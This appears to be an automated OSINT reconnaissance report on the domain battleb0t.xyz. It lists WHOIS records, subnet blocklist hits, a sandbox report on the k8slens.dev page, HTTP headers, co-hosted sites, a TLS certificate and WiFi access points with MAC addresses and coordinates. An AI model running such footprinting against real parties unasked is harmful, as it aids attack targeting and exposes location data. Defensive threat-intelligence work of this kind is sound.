| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | attwifi (Net ID: 00:14:6A:5B:53:92) | 32.8608, -79.9746 |
| 2023-05-12 03:01:28 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.17): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | myLGNet1383 (Net ID: 00:08:52:1E:13:81) | 39.0469, -77.4903 |
| 2023-05-12 03:04:07 | Malicious IP on Same Subnet | Yes | Greensnow | 0 | 0 | 4 | 0 | None | greensnow.co [46.101.128.0/17]
https://blocklist.greensnow.co/greensnow.txt | 46.101.128.0/17 |
| 2023-05-12 02:44:49 | Company Name | No | Company Name Extractor | 1 | 0 | 2 | 0 | None | (c) CentralNic Ltd | Domain Name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.ru
Registrar URL: https://www.reg.ru/
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registry Expiry Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of Domain Names REG.RU, LLC
Registrar IANA ID: 1606
Domain Status: ok https://icann.org/epp#ok
Registrant Organization: Privacy Protection
Registrant State/Province:
Registrant Country: RU
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: DAPHNE.NS.CLOUDFLARE.COM
Name Server: SKIP.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:05.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.com
Registrar URL: https://www.reg.com
Registrar URL: https://www.reg.ru
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registrar Registration Expiration Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of domain names REG.RU LLC
Registrar IANA ID: 1606
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
Status: ok http://www.icann.org/epp#ok
Registrant ID: yhn6mof3dqy-sdhe
Registrant Name: Protection of Private Person
Registrant Street: PO box 87, REG.RU Protection Service
Registrant City: Moscow
Registrant State/Province:
Registrant Postal Code: 123007
Registrant Country: RU
Registrant Phone: +7.4955801111
Registrant Phone Ext:
Registrant Fax: +7.4955801111
Registrant Fax Ext:
Registrant Email: BATTLEB0T.XYZ@regprivate.ru
Admin ID: mhrgfickoq3r30s0
Admin Name: Protection of Private Person
Admin Street: PO box 87, REG.RU Protection Service
Admin City: Moscow
Admin State/Province:
Admin Postal Code: 123007
Admin Country: RU
Admin Phone: +7.4955801111
Admin Phone Ext:
Admin Fax: +7.4955801111
Admin Fax Ext:
Admin Email: BATTLEB0T.XYZ@regprivate.ru
Tech ID: yyj-fcbflruqmlro
Tech Name: Protection of Private Person
Tech Street: PO box 87, REG.RU Protection Service
Tech City: Moscow
Tech State/Province:
Tech Postal Code: 123007
Tech Country: RU
Tech Phone: +7.4955801111
Tech Phone Ext:
Tech Fax: +7.4955801111
Tech Fax Ext:
Tech Email: BATTLEB0T.XYZ@regprivate.ru
Name Server: daphne.ns.cloudflare.com
Name Server: skip.ns.cloudflare.com
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023.05.12T05:44:06Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
TERMS OF USE: The Whois and RDAP services are provided by REG.RU, and contain
information pertaining to Internet domain names registered by our
customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) Registrar of Domain Names REG.RU LLC (https://www.reg.com)
|
| 2023-05-12 02:45:27 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 14, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://k8slens.dev/index.html', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"SM0:5804:304:WilStaging_02"\n "Local\\SM0:5804:304:WilStaging_02"\n "InternetShortcutMutex"\n "SM0:5804:120:WilError_01"\n "Local\\SM0:5804:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:443"\n "138.91.254.96:443"\n "142.250.188.10:443"\n "142.251.46.227:443"\n "34.248.78.39:443"\n "192.30.255.117:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.edgeoffer.microsoft.com"\n "api.github.com"\n "api.k8slens.dev"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "k8slens.dev"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "<meta name="twitter:card" content="summary_large_image">" (Indicator: "dir "; File: "urlref_httpsk8slens.devindex.html")\n Found string "<a class="dropdown-item" href="https://twitter.com/k8slens">TWITTER</a>" (Indicator: "dir "; File: "urlref_httpsk8slens.devindex.html")\n file/memory contains long string with (Indicator: "dir "; File: "urlref_httpsk8slens.devindex.html")\n Found string "<p class="card-text">Loving <a href="https://twitter.com/k8slens">@k8slens</a> a great OSS tool for k8s </p>" (Indicator: "dir "; File: "urlref_httpsk8slens.devindex.html")\n Found string "<p class="card-text"><small class="text-muted"><a href="https://twitter.com/andystopford/status/1364158215466987522"><i class="fab fa-twitter"></i> Dec 8, 2020</small></a></p>" (Indicator: "dir "; File: "urlref_httpsk8slens.devindex.html")\n Found string "<p class="card-text">I\'ve shared it already, but I want to say again that I\'m real happy I found <a href="https://twitter.com/k8slens">@k8slens</a> for Kubernetes work. Makes it much more convenient, especially when juggling multiple clusters!</p>" (Indicator: "dir "; File: "urlref_httpsk8slens.devindex.html")\n Found string "<p class="card-text"><small class="text-muted"><a href="https://twitter.com/TheBlondeBass/status/1374379945380605955"><i class="fab fa-twitter"></i> Mar 23, 2021</small></a></p>" (Indicator: "dir "; File: "urlref_httpsk8slens.devindex.html")\n Found string "<p class="card-text"><small class="text-muted"><a href="https://twitter.com/chriskalmar/status/1354878064698789901"><i class="fab fa-twitter"></i> Jan 28, 2021</small></a></p>" (Indicator: "dir "; File: "urlref_httpsk8slens.devindex.html")\n Found string "<p class="card-text"><small class="text-muted"><a href="https://twitter.com/hueythewookiee/status/1366084768073474048"><i class="fab fa-twitter"></i> Feb 28, 2021</small></a></p>" (Indicator: "dir "; File: "urlref_httpsk8slens.devindex.html")\n Found string "<p class="card-text">Today I just discovered <a href="https://twitter.com/k8slens">@k8slens</a> and I am blown away how helpful this tool is. The open source community is amazing!</p>" (Indicator: "dir "; File: "urlref_httpsk8slens.devindex.html")\n Found string "<p class="card-text"><small class="text-muted"><a href="https://twitter.com/jaydrogers/status/1363986936222908416"><i class="fab fa-twitter"></i> Feb 23, 2021</small></a></p>" (Indicator: "dir "; File: "urlref_httpsk8slens.devindex.html")\n Found string "<p class="card-text">Can\'t imagine working without <a href="https://twitter.com/k8slens">@k8slens</a> again. It saves so much time when debugging. Awesome tool! <span class="hashtag">#Kubernetes</span></p>" (Indicator: "dir "; File: "urlref_httpsk8slens.devindex.html")\n Found string "<p class="card-text"><small class="text-muted"><a href="https://twitter.com/kj187/status/1378030896478048263"><i class="fab fa-twitter"></i> Apr 2, 2021</small></a></p>" (Indicator: "dir "; File: "urlref_httpsk8slens.devindex.html")\n Found string "<p class="card-text"><small class="text-muted"><a href="https://twitter.com/matfsw/status/1352561119983005702"><i class="fab fa-twitter"></i> Jan 22, 2021</small></a></p>" (Indicator: "dir "; File: "urlref_httpsk8slens.devindex.html")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\throttle_store.dat"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\settings.dat"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\local state"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\variations"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\settings.dat"\n "msedge.exe" writes file "\\device\\namedpipe\\wkssvc"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\variations"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\last version"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\vpn tokens-journal"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00006220]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_1]- [targetUID: 00000000-00006220]\n "f_0004cb" has type "PNG image data 1920 x 1200 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00006788]\n "000009.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000009.log]- [targetUID: 00000000-00006788]\n "000013.ldb" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000013.ldb]- [targetUID: 00000000-00006788]\n "7535c146-9755-4ec6-9716-07311086f816.tmp" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT) original size modulo 2^32 33561"- Location: [%TEMP%\\7535c146-9755-4ec6-9716-07311086f816.tmp]- [targetUID: 00000000-00006788]\n "f_0004db" has type "PNG image data 2384 x 1453 8-bit/color RGBA non-interlaced"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_0004db]- [targetUID: 00000000-00006220]\n "f_0004dc" has type "PNG image data 2048 x 1024 8-bit grayscale non-interlaced"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_0004dc]- [targetUID: 00000000-00006220]\n "000014.ldb" has type "data"- [targetUID: N/A]\n "f_0004ca" has type "PNG image data 800 x 800 8-bit/color RGB non-interlaced"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_0004ca]- [targetUID: 00000000-00006220]\n "f_0004c9" has type "gzip compressed data from Unix original size modulo 2^32 1043324"- [targetUID: N/A]\n "f_0004da" has type "PNG image data 400 x 400 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\GrShaderCache\\data_1]- [targetUID: 00000000-00006220]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\GPUCache\\data_1]- [targetUID: 00000000-00006220]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ShaderCache\\data_1]- [targetUID: 00000000-00006220]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\DawnCache\\data_1]- [targetUID: 00000000-00006220]\n "f_0004c8" has type "PNG image data 500 x 500 8-bit/color RGB non-interlaced"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_0004c8]- [targetUID: 00000000-00006220]\n "Web Data" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Web Data]- [targetUID: 00000000-00006788]\n | 185.199.111.153 |
| 2023-05-12 02:54:03 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7c5eacee2fce86e1-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 172.67.135.9 |
| 2023-05-12 03:33:35 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | <!DOCTYPE html>
<html>
<head>
<title>Page Not Found</title>
<style>
</style>
</head>
<body>
<h1>Page Not Found</h1>
</div>
<p>Looks like you've followed a broken link or entered a URL that doesn't exist on this site.</p>
<p>
</svg>
Back to our site
</a>
</p>
</p>
</div>
</div>
</div>
<script>
</script>
</body>
</html>
| https://pics.battleb0t.xyz/images/withat_5.jpg |
| 2023-05-12 03:03:28 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 001328.github.io |
| 2023-05-12 02:58:35 | Phone Number | No | Phone Number Extractor | 0 | 0 | 2 | 0 | None | +74955801111 | Domain Name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.ru
Registrar URL: https://www.reg.ru/
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registry Expiry Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of Domain Names REG.RU, LLC
Registrar IANA ID: 1606
Domain Status: ok https://icann.org/epp#ok
Registrant Organization: Privacy Protection
Registrant State/Province:
Registrant Country: RU
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: DAPHNE.NS.CLOUDFLARE.COM
Name Server: SKIP.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:05.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.com
Registrar URL: https://www.reg.com
Registrar URL: https://www.reg.ru
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registrar Registration Expiration Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of domain names REG.RU LLC
Registrar IANA ID: 1606
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
Status: ok http://www.icann.org/epp#ok
Registrant ID: yhn6mof3dqy-sdhe
Registrant Name: Protection of Private Person
Registrant Street: PO box 87, REG.RU Protection Service
Registrant City: Moscow
Registrant State/Province:
Registrant Postal Code: 123007
Registrant Country: RU
Registrant Phone: +7.4955801111
Registrant Phone Ext:
Registrant Fax: +7.4955801111
Registrant Fax Ext:
Registrant Email: BATTLEB0T.XYZ@regprivate.ru
Admin ID: mhrgfickoq3r30s0
Admin Name: Protection of Private Person
Admin Street: PO box 87, REG.RU Protection Service
Admin City: Moscow
Admin State/Province:
Admin Postal Code: 123007
Admin Country: RU
Admin Phone: +7.4955801111
Admin Phone Ext:
Admin Fax: +7.4955801111
Admin Fax Ext:
Admin Email: BATTLEB0T.XYZ@regprivate.ru
Tech ID: yyj-fcbflruqmlro
Tech Name: Protection of Private Person
Tech Street: PO box 87, REG.RU Protection Service
Tech City: Moscow
Tech State/Province:
Tech Postal Code: 123007
Tech Country: RU
Tech Phone: +7.4955801111
Tech Phone Ext:
Tech Fax: +7.4955801111
Tech Fax Ext:
Tech Email: BATTLEB0T.XYZ@regprivate.ru
Name Server: daphne.ns.cloudflare.com
Name Server: skip.ns.cloudflare.com
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023.05.12T05:44:06Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
TERMS OF USE: The Whois and RDAP services are provided by REG.RU, and contain
information pertaining to Internet domain names registered by our
customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) Registrar of Domain Names REG.RU LLC (https://www.reg.com)
|
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | gclabc (Net ID: 00:0B:86:22:0F:31) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | tsunami (Net ID: 00:0D:29:AC:D8:FE) | 32.8608, -79.9746 |
| 2023-05-12 02:44:19 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | githubusercontent.com | 185.199.110.153 |
| 2023-05-12 03:31:30 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 7 | 0 | None | abuse@support.gandi.net | Domain Name: TELLERIA.COM
Registry Domain ID: 1147715746_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.gandi.net
Registrar URL: http://www.gandi.net
Updated Date: 2022-06-03T06:12:07Z
Creation Date: 2007-08-11T18:34:23Z
Registry Expiry Date: 2023-08-11T18:34:23Z
Registrar: Gandi SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: NS-222-C.GANDI.NET
Name Server: NS-49-A.GANDI.NET
Name Server: NS-89-B.GANDI.NET
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: telleria.com
Registry Domain ID: 1147715746_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.gandi.net
Registrar URL: http://www.gandi.net
Updated Date: 2022-06-03T06:12:07Z
Creation Date: 2007-08-11T16:34:23Z
Registrar Registration Expiration Date: 2023-08-11T18:34:23Z
Registrar: GANDI SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Reseller: CodeSyntax
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Domain Status:
Domain Status:
Domain Status:
Domain Status:
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Marcajes Telleria S.L.
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province:
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: ES
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext:
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext:
Registrant Email: 589e2ad15175f1c51c0a91d29b753337-1077158@contact.gandi.net
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext:
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext:
Admin Email: 098cbf54d6bdbb0fbdb022d1da6e4300-356617@contact.gandi.net
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext:
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext:
Tech Email: 098cbf54d6bdbb0fbdb022d1da6e4300-356617@contact.gandi.net
Name Server: NS-49-A.GANDI.NET
Name Server: NS-89-B.GANDI.NET
Name Server: NS-222-C.GANDI.NET
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:15Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/epp
Reseller Email:
Reseller URL: http://www.codesyntax.com/
Personal data access and use are governed by French law, any use for the purpose of unsolicited mass commercial advertising as well as any mass or automated inquiries (for any intent other than the registration or modification of a domain name) are strictly forbidden. Copy of whole or part of our database without Gandi's endorsement is strictly forbidden.
A dispute over the ownership of a domain name may be subject to the alternate procedure established by the Registry in question or brought before the courts.
For additional information, please contact us via the following form:
https://www.gandi.net/support/contacter/mail/
|
| 2023-05-12 03:03:27 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 000b000.github.io |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | myLGNetA41A (Net ID: 00:01:36:57:A4:18) | 37.7813933,-122.3918002 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Best Western Lobby (Net ID: 00:02:2D:66:D4:75) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:46:17 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Git (software) | cdn-185-199-111-153.github.com |
| 2023-05-12 02:44:39 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | www.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:8d:d7:e0:05:18:38:a5:db:8a:48:64:f2:68:9a:98:22:c8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Apr 26 02:43:31 2023 GMT
Not After : Jul 25 02:43:30 2023 GMT
Subject: CN=battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ab:c7:1b:0c:ed:c6:01:f8:ea:a9:b3:cf:08:17:
4f:a2:cb:7c:34:c4:66:12:e6:ef:f3:98:17:79:c9:
65:ee:66:4c:1f:9a:92:7d:33:ee:07:fa:2e:15:62:
f7:b4:f3:1f:d5:4f:2e:b1:67:a8:49:42:bf:e3:cc:
9a:b7:30:46:c2:68:f5:28:a9:64:69:6f:4c:4b:64:
24:c9:dc:ed:46:9f:a4:1f:c2:ef:6f:36:d0:bc:69:
27:b8:e2:d6:18:70:40:2c:b4:f5:ee:8f:f7:0d:8c:
6e:03:92:e7:5d:d6:3e:bc:bb:c9:5b:28:10:a0:5a:
f6:37:f5:e1:9e:15:23:72:6e:8e:69:01:09:a4:8c:
a4:c9:d7:db:05:01:90:48:4b:90:20:8c:38:7a:0a:
